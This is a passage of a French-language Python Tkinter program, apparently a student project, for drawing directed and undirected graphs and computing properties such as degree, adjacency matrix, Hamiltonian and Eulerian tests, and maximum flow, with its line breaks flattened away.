self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) n=len(self.sommets) self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n)) self.toplevel_dialog_label.pack(side='top') self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True) for i in range(3): self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n') self.toplevel_dialog_label3.pack() pass def sommet(self, event): x,y=event.x,event.y if self.point==[]: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 else: controle=0 for element in self.point: if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25: controle=1 if controle==0: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 #procedure permettant de dessiner un arc entre deux sommets def arc(self, event): for element in self.point: if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10: self.temp.append(element) self.compt+=1 if self.compt==2: self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,100) self.toplevel_dialog.wm_title("Arc") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_arc) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4])) self.label.pack(side='top') self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.pack(side='top') self.valeur.bind("<Return>", self.Close_arc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc) self.yes_button.pack(side='right',fill='x',expand=True) def Close_arc (self,event=None): if self.temp[0][0] < self.temp[1][0]: a=[self.temp[0][0]+10,self.temp[0][1]] b=[self.temp[1][0]-10,self.temp[1][1]] self.graphe.create_line(a,b,arrow="last") try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) elif self.temp[0][0]==self.temp[1][0]: self.graphe.delete(self.temp[0][2]) self.graphe.delete(self.temp[0][3]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan") self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4])) a=(self.temp[0][0],self.temp[0][1]-10.5) b=(self.temp[0][0],self.temp[0][1]-10) self.graphe.create_line(a,b,arrow="last") try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) else: a=[self.temp[0][0]-10,self.temp[0][1]] b=[self.temp[1][0]+10,self.temp[1][1]] self.graphe.create_line(a,b,arrow="last") try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() ########################################### # - Fenetre Graphe Orienter - # # /////////////////////////////////////////////// # # Description: Programme traitant sur les graphes # # Orienter # # /////////////////////////////////////////////// # class Graphe_Non_Oriente(Tk): def __init__(self): Tk.__init__(self) # constructeur de la classe parente #recupere la taille de l'ecrant de l'ordinateur width=self.winfo_screenwidth() height=self.winfo_screenheight() self.largeure=900 self.hauteure=500 self.x=(width/2)-(self.largeure/2) self.y=(height/2)-(self.hauteure/2) #initialisation du canvas self.graphe =Canvas(self, width =self.largeure, height =self.hauteure, bg ="white") self.geometry('{}x{}+{}+{}'.format(self.largeure,self.hauteure,int(self.x),int(self.y))) self.resizable(False,False) self.wm_title('Graphe Non Oriente') self.graphe.pack(side =TOP, padx =5, pady =5) #evenement declancher par les clic de la sourie self.bind("<Double-Button-1>", self.sommet) self.bind("<Button-3>", self.arc) #menu de la fenetre menubar = Menu(self) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Quitter ?", command = self.destroy) filemenu.add_command(label = "Sauvegarder", command = self.save) menubar.add_cascade(label = "Fichier", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_separator() filemenu.add_command(label = "Ordre du graphe", command=self.ordre_graphe) filemenu.add_command(label = "Degre du sommet", command=self.degres_sommet) filemenu.add_command(label = "Matrice d'adjacence", command=self.matriceAdj) filemenu.add_command(label = "Successeur du sommet", command=self.successeur) filemenu.add_command(label = "Predecesseur du sommet", command=self.predeccesseur) filemenu.add_command(label = "Graphe Hamiltonien ?", command=self.hamilton) filemenu.add_command(label = "Graphe Eulerien ?", command=self.euler) filemenu.add_command(label = "Flow maximal", command=self.maxflow) menubar.add_cascade(label = "Traitement", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Tout effacer ?", command =self.delete) menubar.add_cascade(label = "Effacer", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Aide", command =self.aide) menubar.add_cascade(label = "Aide", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) self.config(menu = menubar) #variable globale self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() def delete(self): for element in self.graphe.find_all(): self.graphe.delete(element) self.i=int(0) self.compt=int() self.temp=list() self.connect=list() self.point=list() self.sommets=list() self.couple=list() self.matrice=list() self.var=StringVar() self.entier=int() pass # fonction permettant de fermer la fenetre fille def Close_Toplevel (self): self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() def aide(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,150) self.toplevel_dialog.wm_title("Aide") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=150 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() aide=""" Tracer un sommet: Double clic Tracer un arc: clic gauche sur chaque sommet """ self.label=tk.Label(self.toplevel_dialog, text=aide,justify='left',font='Century 13 bold') self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fenetre permettant de fermet la fenetre fille de sauvegarde def Close_Save (self,event=None): if len(self.var.get())>0: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/{}.png".format(self.var.get())) else: x=self.graphe.winfo_rootx() y=self.graphe.winfo_rooty() w=self.graphe.winfo_width() h=self.graphe.winfo_height() image=ImageGrab.grab((x+2,y+2,x+w-2,y+h-2)) image.save("save/Graphe.png") self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() #fonction de sauvegarde du graphe dessiner def save(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Sauvegarder") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Save) self.label=tk.Label(self.toplevel_dialog, text='Entrer le nom de limage: ') self.label.pack(side='left') self.var=tk.Entry(self.toplevel_dialog) self.var.pack(side='left') self.var.bind("<Return>", self.Close_Save) self.var.bind("<Escape>", self.Close_Toplevel) self.var.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_Save) self.yes_button.pack(side='right',fill='x',expand=True) # fonction permettant de detecter si le graphe est eulerien def euler(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe eulerien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() l=len(self.couple) lg=len(self.sommets) if lg>=2: g1 = Euler(lg) for i in range(l): g1.addEdge(self.couple[i][0],self.couple[i][1]) self.var=g1.test() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de detecter si le graphe est hamiltonien def hamilton(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Graphe hamiltonien") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focu() lg=len(self.couple) if lg>1: l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) k+=1 if k==0: self.matrice[i].append(0) g1 = Hamilton(l) g1.graph = self.matrice self.var=g1.hamCycle() self.label=tk.Label(self.toplevel_dialog, text=self.var) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de connetre le flow maximal def maxflow(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,200) self.toplevel_dialog.wm_title("Flow maximal") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=200 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet source: ') self.label.grid(row=1) self.valeur1=tk.Entry(self.toplevel_dialog) self.valeur1.grid(row=1,column=1) self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet destination: ') self.label.grid(row=2) self.valeur2=tk.Entry(self.toplevel_dialog) self.valeur2.grid(row=2,column=1) self.label=tk.Label(self.toplevel_dialog, text='\n\n') self.label.grid(row=3) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_maxflow) self.yes_button.grid(row=4,column=1) self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=4,column=3) pass def Close_maxflow (self): lg=len(self.couple) if self.valeur1.get() in str(self.sommets) and self.valeur2.get() in str(self.sommets) and lg>0 and self.valeur1.get()!=self.valeur2.get() : l=len(self.sommets) self.matrice=list() for i in range(l): self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(element[2]) k+=1 if k==0: self.matrice[i].append(0) g = Max_flow(self.matrice) src=int(self.valeur1.get()) des=int(self.valeur2.get()) self.label=tk.Label(self.toplevel_dialog, text="Le flow maximal est %d " % g.FordFulkerson(src, des)) self.label.grid(row=6) else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.grid(row=6) pass def matriceAdj(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(300,300) self.toplevel_dialog.wm_title("Matrice D'adjacence") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=300 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.focus() lg=len(self.couple) if lg>0: l=len(self.sommets) self.matrice=list() for i in range(l): resultat="" resultat+=str(self.sommets[i])+"| " self.matrice.append([]) for j in range(l): k=int(0) temp=list() temp.append(self.sommets[i]) temp.append(self.sommets[j]) for element in self.couple: if temp[0]==element[0] and temp[1]==element[1]: self.matrice[i].append(1) resultat+="1 " k+=1 if k==0: self.matrice[i].append(0) resultat+="0 " self.label=tk.Label(self.toplevel_dialog, text=resultat) self.label.pack(side='top') pass else: self.label=tk.Label(self.toplevel_dialog, text="Votre requette ne peut etre traiter") self.label.pack(side='top') self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) #fonction permettant de donner le successeur d'un sommet def successeur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Successeur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_suc) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_suc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_suc) self.yes_button.grid(row=1,column=4) pass def Close_suc(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[0]): resultat+=str(element[1])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) successeur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def predeccesseur(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(650,100) self.toplevel_dialog.wm_title("Predecesseur d'un sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=650 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_pred) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_pred) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=6) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_pred) self.yes_button.grid(row=1,column=4) def Close_pred(self): if self.valeur.get() in str(self.sommets): resultat="" for element in self.couple: if self.valeur.get() == str(element[1]): resultat+=str(element[0])+" " self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le(s) predecesseur du sommet {} est: {}'.format(self.valeur.get(),resultat)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def degres_sommet(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(600,100) self.toplevel_dialog.wm_title("Degre du sommet") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=600 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_degre) self.toplevel_dialog.focus() self.label=tk.Label(self.toplevel_dialog, text='Entrer sommet: ') self.label.grid(row=1) self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.grid(row=1,column=1) self.valeur.bind("<Return>", self.Close_degre) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.grid(row=1,column=5) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_degre) self.yes_button.grid(row=1,column=3) def Close_degre(self): if self.valeur.get() in str(self.sommets): k=int(0) for element in self.couple: if self.valeur.get() == str(element[1]): k+=1 self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Le degre du sommet {} est: {}'.format(self.valeur.get(),k)) self.toplevel_dialog_label.grid(row=2) else: self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='Valeur entrer incorrecte') self.toplevel_dialog_label.grid(row=2) def ordre_graphe(self): self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,50) self.toplevel_dialog.wm_title("Ordre du graphe") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=50 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_Toplevel) self.toplevel_dialog.fovus() n=len(self.sommets) self.toplevel_dialog_label=tk.Label(self.toplevel_dialog, text='L ordre du graphe est: {}'.format(n)) self.toplevel_dialog_label.pack(side='top') self.toplevel_dialog_yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=82,command=self.Close_Toplevel) self.toplevel_dialog_yes_button.pack(side='right',fill='x',expand=True) for i in range(3): self.toplevel_dialog_label3=tk.Label(self.toplevel_dialog, text='\n') self.toplevel_dialog_label3.pack() pass def sommet(self, event): x,y=event.x,event.y if self.point==[]: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 else: controle=0 for element in self.point: if element[0]-25 < event.x < element[0]+25 and element[1]-25 < event.y < element[1]+25: controle=1 if controle==0: self.sommet=self.graphe.create_oval(x-10,y-10,x+10,y+10, fill="cyan") self.numero=self.graphe.create_text(x,y,text="{}".format(self.i)) self.point.append([event.x,event.y,self.sommet,self.numero,self.i]) self.sommets.append(self.i) self.i+=1 #procedure permettant de dessiner un arc entre deux sommets def arc(self, event): for element in self.point: if element[0]-10 < event.x < element[0]+10 and element[1]-10 < event.y < element[1]+10: self.temp.append(element) self.compt+=1 if self.compt==2: self.wm_attributes("-disable",True) self.toplevel_dialog=tk.Toplevel(self) self.toplevel_dialog.minsize(502,100) self.toplevel_dialog.wm_title("Arc") width=self.toplevel_dialog.winfo_screenwidth() height=self.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=100 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) self.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) self.toplevel_dialog.transient(self) self.toplevel_dialog.protocol("WM_DELETE_WINDOW", self.Close_Toplevel) self.toplevel_dialog.bind("<Return>", self.Close_arc) self.toplevel_dialog.focus self.label=tk.Label(self.toplevel_dialog, text='Entrer la distance entre le sommet {} et le sommet {}: '.format(self.temp[0][4],self.temp[1][4])) self.label.pack(side='top') self.valeur=tk.Entry(self.toplevel_dialog) self.valeur.pack(side='top') self.valeur.bind("<Return>", self.Close_arc) self.valeur.bind("<Escape>", self.Close_Toplevel) self.valeur.focus_set() self.yes_button=ttk.Button(self.toplevel_dialog,text='Retour',width=25,command=self.Close_Toplevel) self.yes_button.pack(side='right',fill='x',expand=True) self.yes_button=ttk.Button(self.toplevel_dialog,text='Valider',width=25,command=self.Close_arc) self.yes_button.pack(side='right',fill='x',expand=True) def Close_arc (self,event=None): if self.temp[0][0] < self.temp[1][0]: a=[self.temp[0][0]+10,self.temp[0][1]] b=[self.temp[1][0]-10,self.temp[1][1]] self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier!=0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) elif self.temp[0][0]==self.temp[1][0]: self.graphe.delete(self.temp[0][2]) self.graphe.delete(self.temp[0][3]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-25,self.temp[0][0]+1,self.temp[0][1]) self.graphe.create_oval(self.temp[0][0]-10,self.temp[0][1]-10,self.temp[0][0]+10,self.temp[0][1]+10,fill="cyan") self.graphe.create_text(self.temp[0][0],self.temp[0][1],text="{}".format(self.temp[0][4])) a=(self.temp[0][0],self.temp[0][1]-10.5) b=(self.temp[0][0],self.temp[0][1]-10) self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) else: a=[self.temp[0][0]-10,self.temp[0][1]] b=[self.temp[1][0]+10,self.temp[1][1]] self.graphe.create_line(a,b) try: self.entier=int(self.valeur.get()) except ValueError: pass if self.entier>0 or self.entier<0 : pass else: self.entier=int(1) self.couple.append([self.temp[0][4],self.temp[1][4],self.entier]) self.couple.append([self.temp[1][4],self.temp[0][4],self.entier]) self.compt=int() self.temp=list() self.wm_attributes("-disable",False) self.toplevel_dialog.destroy() self.deiconify() ###################################################### # - Programme Principale - # # /////////////////////////////////////////////// # # Description: Fenetre Principale du Programme # # /////////////////////////////////////////////// # if __name__ == '__main__': #initialisation du canvas fen =Tk() width=fen.winfo_screenwidth() height=fen.winfo_screenheight() largeure=900 hauteure=500 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) graphe =Canvas(fen, width =largeure, height =hauteure ,bg="light yellow") fen.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.wm_title("Graphe Trace") graphe.pack(side =TOP, padx =5, pady =5) fen.resizable(False,False) icon=PhotoImage(file='img/img.png') fen.tk.call('wm','iconphoto',fen._w,icon) photo = PhotoImage(file="img/img.png",width=largeure,height=hauteure) graphe.create_image(300, 90, anchor=NW, image=photo) def menu(): menubar = Menu(fen) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label="Graphe Oriente", command = graphe_oriente) filemenu.add_command(label="Graphe Non Oriente", command = graphe_non_oriente) filemenu.add_separator() filemenu.add_command(label = "Quitter", command = fen.destroy) menubar.add_cascade(label = "Graphe", menu = filemenu) filemenu = Menu(menubar, tearoff = 0) filemenu.add_command(label = "Auteur", command = Auteur) filemenu.add_command(label="Description", command = Description) filemenu.add_command(label="Version", command = Version) menubar.add_cascade(label = "A Propos", menu = filemenu) fen.config(menu = menubar) fen.mainloop() pass def donothing(): #filewin = Toplevel(root) #button = Button(filewin, text="Do nothing button") #button.pack() pass def graphe_oriente(): # mise en place du canevas app = GrapheOriente() app.mainloop() fen.mainloop() def graphe_non_oriente(): # mise en place du canevas app = Graphe_Non_Oriente() app.mainloop() fen.mainloop() def Auteur(): a_propos=""" Ce logiciel a ete creer par des etudiants en deuxiemme annnee Miage. Notamment par: Sawadogo R.R Sylvain Sawadogo Sidbewende Omar Yameogo Pingdwinde Boris """ fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(502,210) fen.toplevel_dialog.wm_title("Auteur") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=210 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') fen.label.grid(row=1,padx =5, pady =5) fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel) fen.yes_button.grid(row=2) def Description(): a_propos=""" Ce logiciel a ete creer dans le cadre de traitement de graphe. """ fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(502,126) fen.toplevel_dialog.wm_title("Description") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=502 hauteure=126 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') fen.label.grid(row=1,padx =5, pady =5) fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=82,command=Close_Toplevel) fen.yes_button.grid(row=2) def Version(): a_propos="""Version 1.0.0""" fen.wm_attributes("-disable",True) fen.toplevel_dialog=tk.Toplevel(fen) fen.toplevel_dialog.minsize(300,64) fen.toplevel_dialog.wm_title("Version") width=fen.toplevel_dialog.winfo_screenwidth() height=fen.toplevel_dialog.winfo_screenheight() largeure=300 hauteure=64 x=(width/2)-(largeure/2) y=(height/2)-(hauteure/2) fen.toplevel_dialog.geometry('{}x{}+{}+{}'.format(largeure,hauteure,int(x),int(y))) fen.toplevel_dialog.transient(fen) fen.toplevel_dialog.protocol("WM_DELETE_WINDOW", Close_Toplevel) fen.label=tk.Label(fen.toplevel_dialog, text=a_propos,justify='left',font='Century 13 bold') 